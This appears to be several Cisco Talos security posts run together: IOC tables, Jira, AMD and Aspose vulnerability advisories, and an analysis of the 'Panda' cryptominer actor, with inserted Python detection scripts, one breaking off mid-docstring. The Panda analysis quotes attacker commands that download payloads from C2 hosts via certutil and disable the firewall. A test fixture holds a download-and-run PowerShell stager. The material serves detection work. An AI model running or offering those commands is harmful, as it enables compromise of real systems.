<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: WOW64) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ObjectName) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Description) | 18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config0) | 18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config1) | 18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES (Value Name: Config2) | 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ImagePath) | 12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\cvjpowcr) | 4
<HKU>\.DEFAULT\CONTROL PANEL\BUSES | 3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\haoutbhw) | 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\wpdjiqwl) | 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\mftzygmb) | 2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\unbhgouj) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\ibpvucix) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\exlrqyet) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\tmagfnti) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\lesyxfla) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\slzfemsh) | 1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS (Value Name: C:\Windows\SysWOW64\yrflksyn) | 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
239[.]255[.]255[.]250 | 18
69[.]55[.]5[.]250 | 18
172[.]217[.]3[.]100 | 18
46[.]4[.]52[.]109 | 18
176[.]111[.]49[.]43 | 18
85[.]25[.]119[.]25 | 18
144[.]76[.]199[.]2 | 18
144[.]76[.]199[.]43 | 18
43[.]231[.]4[.]7 | 18
192[.]0[.]47[.]59 | 18
95[.]181[.]178[.]17 | 18
173[.]194[.]207[.]27 | 16
216[.]146[.]35[.]35 | 15
213[.]205[.]33[.]63 | 14
172[.]217[.]197[.]26 | 14
208[.]76[.]51[.]51 | 13
208[.]76[.]50[.]50 | 13
148[.]163[.]156[.]1 | 12
64[.]233[.]186[.]26 | 12
208[.]71[.]35[.]137 | 11
172[.]217[.]5[.]228 | 11
67[.]231[.]154[.]162 | 11
209[.]85[.]203[.]27 | 11
199[.]5[.]26[.]46 | 10
199[.]5[.]157[.]131 | 10
*See JSON for more IOCs
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa | 18
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org | 18
250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org | 18
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net | 18
whois[.]iana[.]org | 18
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net | 18
whois[.]arin[.]net | 18
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org | 18
microsoft-com[.]mail[.]protection[.]outlook[.]com | 18
honeypus[.]rusladies[.]cn | 18
marina99[.]ruladies[.]cn | 18
sexual-pattern3[.]com | 18
coolsex-finders5[.]com | 18
smtp[.]secureserver[.]net | 15
super-efectindating3[.]com | 13
ipinfo[.]io | 12
mx1[.]emailsrvr[.]com | 12
mx0a-001b2d01[.]pphosted[.]com | 12
mx-aol[.]mail[.]gm0[.]yahoodns[.]net | 11
etb-1[.]mail[.]tiscali[.]it | 10
mta5[.]am0[.]yahoodns[.]net | 9
mx-eu[.]mail[.]am0[.]yahoodns[.]net | 9
eur[.]olc[.]protection[.]outlook[.]com | 9
aol[.]com | 9
hotmail-com[.]olc[.]protection[.]outlook[.]com | 9
*See JSON for more IOCs
Files and/or directories created | Occurrences
%SystemRoot%\SysWOW64\config\systemprofile | 18
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> | 18
%TEMP%\<random, matching '[a-z]{8}'>.exe | 18
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) | 11
%SystemRoot%\SysWOW64\config\systemprofile:.repos | 3
%TEMP%\supvobl.exe | 1

File Hashes

1599aff065e6687acafc61a6f572652d1a0f7a0b17e3a71ca32fe848f2dc2732
1f8ca64991ba709a857f0dcd5bc5d6e9b0885ebc929989f03be3dfb58ecf9ce0
2360e7fb046aff05970dafbb74cdf5544e4699143605d8334772554f50ead3ac
4368a7bb048f1ba83bbd8430b2f49cb566cd69642ed3e9de3675f69533125b29
471c51b4340ed0091aeaf0402f762230689951e448f703033ed4bd1f2fb7a7d6
5195a9a5a3094c3735668216461d2be638152ae0738dab4d8a9295b697bc567c
675f23d881b4685a171767073e01f889ddeb879af7036fde7bcf341f33699da5
8092a1a1db9009435d1177afdef7fb7334e090b8d1b2f5c3e4d121ac0c110cbb
8120184d0a6340d01c5226d28747a2da5c81ef323e126df5a92ff9ada41b5c42
86cf3a207714ea953fb6834643b68064b912c077d44c31b9ed287feab0bc0e4a
8baff9107ff5c48ed53d633fe18f039d3cdd30eedcf05e55b4c467f9f9aed831
9c8275a2d03edd430e8263980a2c31106ab7116e40b93bead7108c6ed97e29fc
a3e921ece8ec6a501dbb88c78fea54e2bd15e46b22cb61abced99973c70cf6f8
c2606f0413239f1c60cccd260374e6b88694718af0389be6d173a5c466e7d819
c2a86711660f12b21a7f3fe3fde6b7f07faeb486111d71e34abc27f90f31b415
c94a846dc45a26b4d3869ac32de34aa780720d4cd21743847bb87a2da4a14a8b
d7d152e0dc028976050dbace9078c99feddce0f805c1892b4f1ac92feaf5fe15
dae992cf09f4681239e858e69eebfff7e35786069d7719482ccbb15615ec7a7e

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella



Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain techniques to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, which also protect against zero-day vulnerabilities.
CVE-2019-0708 detected - (7002)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Because it can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Madshi injection detected - (2740)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Kovter injection detected - (1860)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Process hollowing detected - (1503)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a legitimate process is started in a suspended state, its in-memory image is unmapped, and the payload (unpacked from the parent's obfuscated or encrypted contents) is written into that address space before the main thread is resumed. The payload then runs under the name and path of the legitimate executable.
Trickbot malware detected - (1131)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Gamarue malware detected - (205)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (128)
InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (95)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present by default on all currently supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
PowerShell file-less infection detected - (89)
A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
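The two PowerShell signals above (an excessively long command line, and a payload pulled out of an environment variable) are straightforward to reproduce as host-side detection logic. The script below is an added example, not code from Talos or from AMP: it runs three rules over constructed process-creation records (image path plus command line), decodes any -EncodedCommand argument so the environment-variable rule also sees the decoded script, and returns the names of the rules that fired. The 500-character threshold, the rule names and the sample command lines are assumptions made for the illustration.

```python
import base64
import re

# Assumed threshold for "excessively long"; tune it against your own baseline.
LONG_CMDLINE_THRESHOLD = 500

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# followed by base64 of the UTF-16LE script text.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{16,})")

# Payload kept in an environment variable and handed to Invoke-Expression (Kovter/Poweliks style).
ENV_PAYLOAD = re.compile(
    r"(?i)(?:iex|invoke-expression)[^;|]*\$env:\w+"      # iex $env:name
    r"|\$env:\w+\s*\|\s*(?:iex|invoke-expression)"       # $env:name | iex
    r"|\[Environment\]::GetEnvironmentVariable\s*\("     # .NET accessor for the same thing
)

POWERSHELL_IMAGE = re.compile(r"(?i)(?:^|\\)(?:powershell|pwsh)(?:_ise)?\.exe$")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(image, cmdline):
    """Return the set of rule names that fire for one process-creation record."""
    rules = set()
    if not POWERSHELL_IMAGE.search(image):
        return rules
    if len(cmdline) > LONG_CMDLINE_THRESHOLD:
        rules.add("long_command_line")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        rules.add("encoded_command")
    # Run the env-var rule over the raw line and the decoded script, so encoding cannot hide it.
    for text in (cmdline, decoded or ""):
        if ENV_PAYLOAD.search(text):
            rules.add("env_var_payload")
    return rules


def scan(events):
    """Return [(index, sorted rule names)] for every record that triggered at least one rule."""
    findings = []
    for index, (image, cmdline) in enumerate(events):
        rules = analyze(image, cmdline)
        if rules:
            findings.append((index, sorted(rules)))
    return findings


def _encode(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records (image, command line); not real telemetry. Record 1 mimics a padded
# download-and-run stager; record 2 mimics a Kovter-style launcher reading its payload from $env.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = (
    "$c = New-Object System.Net.WebClient; "
    "$p = $c.DownloadString('http://stager.invalid/p.ps1'); "
    + "$x = 0; " * 60          # filler standing in for the bulk of an obfuscated script
    + "Invoke-Expression $p"
)
SAMPLE_EVENTS = [
    (PS_EXE, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    (PS_EXE, "powershell.exe -NoP -W Hidden -enc " + _encode(STAGER)),
    (PS_EXE, 'powershell.exe -NoProfile -Command "iex $env:mbcbqjz"'),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo -enc QUFBQUFBQUFBQUFBQUFBQQ=="),
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(index, rules)
```

In production, feed it Sysmon Event ID 1 or Windows 4688 records (with command-line auditing enabled). Tune the length threshold to your own baseline, because installers and configuration-management tooling legitimately produce long PowerShell lines, and treat the environment-variable rule as high confidence: there is almost no benign reason to pipe an environment variable into Invoke-Expression.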
Fusion adware detected - (41)
Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware.

Vulnerability Spotlight: Multiple vulnerabilities in Atlassian Jira

Ben Taylor of Cisco ASIG discovered these vulnerabilities.

Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is issue-tracking and project-management software that lets users create, organize and track tasks. These bugs cover a range of scenarios, including the ability to execute script inside Jira and the disclosure of information about tasks created in Jira, including the names of attached documents.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlassian to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Atlassian Jira WikiRenderer parser XSS vulnerability (TALOS-2019-0833/CVE-2019-8444)

An exploitable XSS vulnerability exists in the WikiRenderer functionality of Atlassian Jira, from version 7.6.4 to 8.1.0. A specially crafted comment can cause a persistent XSS. An attacker can create a comment or worklog entry to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Atlassian Jira CSRF login vulnerability (TALOS-2019-0834)

An exploitable CSRF vulnerability exists in Atlassian Jira, from version 7.6.4 to 8.1.0. The login form does not require a CSRF token. As a result, an attacker can log a user into the system under an unexpected account.

Read the complete vulnerability advisory here for additional information.

                Atlassian Jira CSRF login vulnerability (TALOS-2019-0835/CVE-2019-14998)

An exploitable CSRF vulnerability exists in Atlassian Jira 7.6.4. An attacker controlling a subdomain different from the subdomain hosting Jira can inject cookies and thereby control the CSRF header token. An attacker can create a cookie and submit CSRF attacks on behalf of a logged-in user to trigger this vulnerability.

                Read the complete vulnerability advisory here for additional information.

Atlassian Jira Issue key information disclosure vulnerability (TALOS-2019-0836/CVE-2019-14995)

                An issue key information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid issue keys and invalid issue keys via the `/rest/api/1.0/render` API endpoint.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira issue attachment name information disclosure vulnerability (TALOS-2019-0837/CVE-2019-14995)

An issue attachment name information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid attachment names and invalid attachment names for any given issue via the `/rest/api/1.0/render` API endpoint.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira Tempo plugin issue summary information disclosure vulnerability (TALOS-2019-0838/CVE-2019-5095)

                An issue summary information disclosure vulnerability exists in Atlassian Jira Tempo plugin, version 4.10.0. Authenticated users can obtain the summary for issues they do not have permission to view via the Tempo plugin.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira issueTable username information disclosure vulnerability (TALOS-2019-0839/CVE-2019-XXXX)

A username information disclosure vulnerability exists in Atlassian Jira, from versions 7.6.4 to 8.1.0. Anonymous users can differentiate between valid usernames and invalid usernames via the `/rest/issueNav/1/issueTable` API endpoint.

                Read the complete vulnerability advisory here for additional information.

                Atlassian Jira worklog information disclosure vulnerability (TALOS-2019-0840/CVE-2019-XXXX)

A worklog information disclosure vulnerability exists in Atlassian Jira, versions 7.6.4 to 8.1.0. Authenticated users can view worklog details for issues they do not have permission to view via the `/rest/api/2/worklog/list` API endpoint. They can also obtain a list of worklog IDs via `/rest/api/2/worklog/updated`.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that versions 7.6.4 through 8.1.0 of Atlassian Jira are affected by these vulnerabilities.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 50110, 50111, 50114

                Vulnerability Spotlight: AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability


                Piotr Bania of Cisco Talos discovered this vulnerability.

Some AMD Radeon cards contain a remote code execution vulnerability in their ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMware Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shader inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to gain the ability to remotely execute code on the victim machine.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with AMD to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                AMD ATI Radeon ATIDXX64.DLL shader functionality remote code execution vulnerability (TALOS-2019-0818/CVE-2019-5049)

                An exploitable memory corruption vulnerability exists in AMD ATIDXX64.DLL driver, versions 25.20.15031.5004 and 25.20.15031.9002. A specially crafted pixel shader can cause an out-of-bounds memory write. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from within a VMware guest, potentially allowing code execution on the associated VMware host.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

Talos tested and confirmed that this vulnerability affects AMD ATIDXX64.DLL, versions 25.20.15031.5004 and 25.20.15031.9002, while running on the Radeon RX 550/550 Series. This vulnerability can only be exploited when VMware Workstation 15 (version 15.0.4, build 12990004) is running with Windows 10 x64 as the guest VM.


                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 49978, 49979

                New Cisco Talos web reputation verdicts

                Talos has updated and expanded the Talos Threat Levels used to describe our web reputation verdicts. 

There will be no impact on the efficacy of Talos Web Reputation. For a short period, TalosIntelligence.com will show both the new and the old threat level verdicts.

                Here’s a rundown of our new Threat Levels verbiage.

                Vulnerability Spotlight: Multiple vulnerabilities in Aspose PDF API


                Marcin Noga of Cisco Talos discovered these vulnerabilities.

                Cisco Talos recently discovered multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Aspose to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Aspose.PDF FunctionType 0 remote code execution vulnerability (TALOS-2019-0809/CVE-2019-5042)

                An exploitable use-after-free vulnerability exists in the way FunctionType 0 PDF elements are processed in Aspose.PDF. A specially crafted PDF can cause a dangling heap pointer, resulting in a use-after-free. An attacker can send a malicious PDF to trigger this vulnerability. 

                Read the complete vulnerability advisory here for additional information. 

Aspose.PDF for C++ LZWDecode filter predictor remote code execution vulnerability (TALOS-2019-0855/CVE-2019-5066)

                An exploitable use-after-free vulnerability exists in the way LZW compressed streams are processed in Aspose.PDF 19.2. A specially crafted PDF can cause a dangling heap pointer, resulting in a use-after-free. To trigger this vulnerability, a specifically crafted PDF document needs to be processed by the target application.

                Read the complete vulnerability advisory here for additional information.

Aspose.PDF for C++ parent generation remote code execution vulnerability (TALOS-2019-0856/CVE-2019-5067)

                An uninitialized memory access vulnerability exists in the way Aspose.PDF for C++ 19.2 handles invalid parent object pointers. A specially crafted PDF can cause a read and write from uninitialized memory, resulting in memory corruption and possibly arbitrary code execution. To trigger this vulnerability, a specifically crafted PDF document needs to be processed by the target application.

                Read the complete vulnerability advisory here for additional information. 

                Versions tested

                Talos tested and confirmed that these vulnerabilities affect Aspose.PDF, version 19.2.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 50730, 50731, 50738, 50739


                Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”

                By Christopher Evans and David Liebenberg.


                Executive summary

                A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.

                Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.

Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread "MassMiner" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications and IT services industries were affected in these campaigns.


                First sightings of the not-so-elusive Panda

                We first observed this actor in July of 2018 exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was associated with a campaign called "MassMiner" through the wallet, infrastructure, and post-exploit PowerShell commands used.

Panda used Masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638). They used PowerShell post-exploit to download a miner payload called "downloader.exe," saving it in the TEMP folder under a simple number filename such as "13.exe" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000.

                By October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times.
                The sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block.

                One of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name "Panda."

                Bulehero connection

                Around the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called "download.exe" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as "13.exe" and execute it. The file server turned out to be an instance of HFS hosting four malicious files.

                Running the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining.

Additionally, the sample attempts to shut down the victim's firewall with commands such as "cmd /c net stop MpsSvc". The malware also modifies the access control list to grant full access to certain files by running cacls.exe.

                For example:
                cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F
                Both of these behaviors have also been observed in previous MassMiner infections.

                The malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign.

                Additionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the "Shadow Brokers" exploits and were installed in a suspiciously named directory: "\Windows\InfusedAppe\Eternalblue139\specials\".

                Evolution of Panda

                In January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China.

                Panda used this vulnerability to both directly download a file called "download.exe" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path "/public/hydra.php", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to "/public/hydra.php". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations.

                In March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.

At the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called "download.exe" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename, e.g. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named "wercplshost.exe" from fid[.]hognoob[.]se as well as a configuration file called "cfg.ini" from uio[.]hognoob[.]se, which provides configuration details for the miner.

                "Wercplshost.exe" contains exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.

                Soon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: "certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe". The coinminer is also run using the command "cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\[filename].exe".

The updated payload still includes exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits. One departure, however, is in how targets are chosen for scanning: previously observed samples acquired the victim's internal IP and reached out to the Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample instead installs WinPcap and the open-source tool Masscan and scans for open ports on public IP addresses, saving the results to "Scant.txt" (note the typo). The sample also writes a list of hardcoded IP ranges to "ip.txt" and passes it to Masscan to scan for port 445, saving the results to "results.txt." This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords.

                In June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.

                Recent activity

                Panda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of "a" - "z" characters and the last five consisting of digits (e.g., "xblzcdsafdmqslz19595.exe"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.

                Besides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz.

                One difference is that several samples contained a Gh0st RAT default mutex "DOWNLOAD_SHELL_MUTEX_NAME" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior.

On August 19, 2019, we observed that Panda had added another set of domains to their inventory of C2 and payload-hosting infrastructure. In line with their previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as "BBBBB" instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.

                In line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to "oo[.]mygoodluck[.]best:51888:WervPoxySvc", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.

                Cisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.
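The command lines quoted throughout this write-up (Certutil as a downloader, the ping-based delay before launching the miner, the MpsSvc stop, the scheduled cacls task, and the 15-letter/5-digit Temp filenames) are distinctive enough to match in endpoint process-creation telemetry. The following is an added example, not Talos or Panda code; the rule names and the sample events are constructed for illustration, and the URL host is a placeholder.

```python
"""Flag process-creation command lines that match the Panda TTPs described above.

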